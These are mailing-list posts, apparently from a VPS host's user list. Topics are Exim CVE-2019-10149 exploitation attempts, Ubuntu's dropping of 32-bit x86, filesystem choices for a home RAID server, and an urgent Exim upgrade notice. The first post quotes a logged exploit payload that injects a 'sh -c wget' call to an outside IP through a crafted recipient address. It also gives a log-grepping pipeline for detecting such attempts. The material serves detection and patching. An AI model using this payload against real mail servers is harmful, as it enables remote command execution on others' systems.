Hello,
I've just ran a grep on all of my mail logs for the string "run{" to
see who's been trying to exploit CVE-2019-10149. A successful match
looks like this on my MTA (Exim):
2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176] F=<support(a)service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}(a)mail.bitfolk.com>: Unrouteable address
This appears to be attempting to execute:
sh -c "wget 64.50.180.45/tmp/85.119.82.70
on my host. I assume that the attacker watches their HTTP logs for
requests for /tmp/85.119.82.70 and then they know they've found an
exploitable host.
Here's a list of offenders sorted by attempt count:
Count Attacker Country AS
-------------------------------------------------------------------------------------------------
18 89.248.171.57 ( scanner20.openportstats.com) NL INT-NETWORK, SC [AS202425]
8 163.172.157.143 (143-157-172-163.rev.cloud.scaleway.com) GB AS12876, FR [AS12876]
6 104.237.134.176 (li810-176.members.linode.com) US LINODE-AP Linode, LLC, US [AS63949]
3 149.56.142.192 ( 192.ip-149-56-142.net) CA OVH, FR [AS16276]
3 104.200.137.239 ( mx239.odesktrack.com) US TOTAL-SERVER-SOLUTIONS - Total Server Solutions L.L.C., US [AS46562]
2 27.69.172.229 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
1 95.139.230.110 (node-110-230-139-95.domolink.tula.net) RU ROSTELECOM-AS, RU [AS12389]
1 79.173.123.131 ( Unset reverse DNS) RU TKTOR, RU [AS44270]
1 46.150.228.178 ( Unset reverse DNS) RU ABRIKOS-AS, RU [AS196768]
1 27.70.156.161 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
1 27.69.172.239 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
1 27.69.172.214 ( localhost) VN VIETEL-AS-AP Viettel Group, VN [AS7552]
Most worrying, a BitFolk IP was amongst my findings. i.e. there is a
BitFolk customer VPS also doing this. Most likely they have already
been compromised by this technique. I've removed them from the
results above but I expect if you search your own logs you'll find
them. They have already been notified.
I created the above output with this script:
https://gist.github.com/grifferz/f92a9c885443a0db8776c4f2f10f914f
To use it in this case would be something like:
$ zcat -f /var/log/exim4/mainlog* \
| grep "run{" \
| awk -F'[' '{ gsub(/\].*/, "", $2); print $2 }' \
| sort | uniq -c | sort -rn | ~/attackers.sh
The awk is separating an IP address out of the [1.2.3.4]. The
sort/uniq/sort is generating an event count. attackers.sh is merely
getting extra info about the IP address.
Cheers,
Andy
--
https://bitfolk.com/ -- No-nonsense VPS hosting
Hello,
If I am reading this correctly:
https://discourse.ubuntu.com/t/i386-architecture-will-be-dropped-starting-w…
then 18.04 was the last LTS release of Ubuntu on 32-bit x86 CPUs.
If you wish to run Ubuntu 20.04 at BitFolk then you will need to do
that as 64-bit amd64.
As Ubuntu supports 18.04 to some degree out to the year 2028, if
you're currently on 32-bit then you could remain on that release for
some time. Although you will of course find it harder and harder to
get by with older package versions.
If you are currently on 32-bit Ubuntu and wish to switch to 64-bit
you can do so yourself by doing a self-install:
https://tools.bitfolk.com/wiki/Using_the_self-serve_net_installer
You would need to use the "arch" command first to switch from 32-bit
to 64-bit.
If re-installing is too much disruption, a reminder that we are
happy to give you an additional VM for free for up to 2 weeks for
you to migrate into:
https://tools.bitfolk.com/wiki/Migrating_to_a_new_VPS
Finally, it is possible to cross-grade from 32-bit to 64-bit, but
the procedure is complicated, scary, and not supported by either
Ubuntu or BitFolk. More info here:
http://users.digitalkingdom.org/~rlpowell/hobbies/debian_arch_up/index.htmlhttps://wiki.debian.org/CrossGrading
(Yes, these are for Debian, but the steps are basically the same for
Ubuntu)
The only BitFolk-specific deviation from the above procedure that is
required is to make sure to use the "arch" command in the Xen Shell
to switch to 64-bit before you try to boot your 64-bit kernel.
Otherwise it starts a 32-bit boot loader that won't work. It won't
hurt anything, it just won't work until you change it.
Cheers,
Andy
--
https://bitfolk.com/ -- No-nonsense VPS hosting
With the discussion about RAID 10, that got me back to thinking about
better/alternative system to my current RAID1+LVM+EXT4 setup on our
Linux home server and I'm looking for advice from other members.
Currently we have 13.6 TB of storage (a lot of which are photos by my
semi-professional girlfriend, and videos from our wildlife cam which
produces about 15 - 20GB of videos a day [email me off-list if you want
to want the URLs of my fledgling Youtube hedgehog and bird channels]).
There is some amount of file duplication, for instance where I have
stuck old backups (copied files and folders, not tar/compressed
archives) on there or photos/videos have been copied to different
folders (e.g. to categorise), so filesystems with built-in deduplication
(like I believe BTRFS has) would be nice. However my main priorities
are: maintaining data integrity, ease of administration, and really a
sub-category of that: ease to expand or shrink and reallocate storage as
required (if necessary - quotas are not required, but crashing due to a
full disk is to be avoided).
For years I have been looking at BTRFS, but it's never sounded 100%
production ready to me (although I remember that at least one distro
made it their default fs). Andy's mention of ceph and stratis were
something new to me, but I'm not sure if they are a bit much for a
single server, and I've no experience with ZFS, but I think I read about
some disadvantages that put me off a few years back, but I forget what
they were now.
Anyway, what do/would you use for this sort of scenario/requirement or
what are your experiences with suitable filesystems for my
requirements? Just to be clear - I want to ensure that a single disk
failure is very unlikely to result in data loss. Also, all disks are
currently the spinning disk type, so any features that takes advantage
of SSDs would be wasted.
Thanks
Gavin
Hello,
If you run Exim and have local users you will want to make sure that
it is upgraded as a matter of urgency as there is a trivial
arbitrary command execution as root bug in most recent versions:
https://seclists.org/oss-sec/2019/q2/152
Even if you are the only local user you should upgrade as it's
possible, though more difficult, to exploit remotely.
Cheers,
Andy
--
https://bitfolk.com/ -- No-nonsense VPS hosting
